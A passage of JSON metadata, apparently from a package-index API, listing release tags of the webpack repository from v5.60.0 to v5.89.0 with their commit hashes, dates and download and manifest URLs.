https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts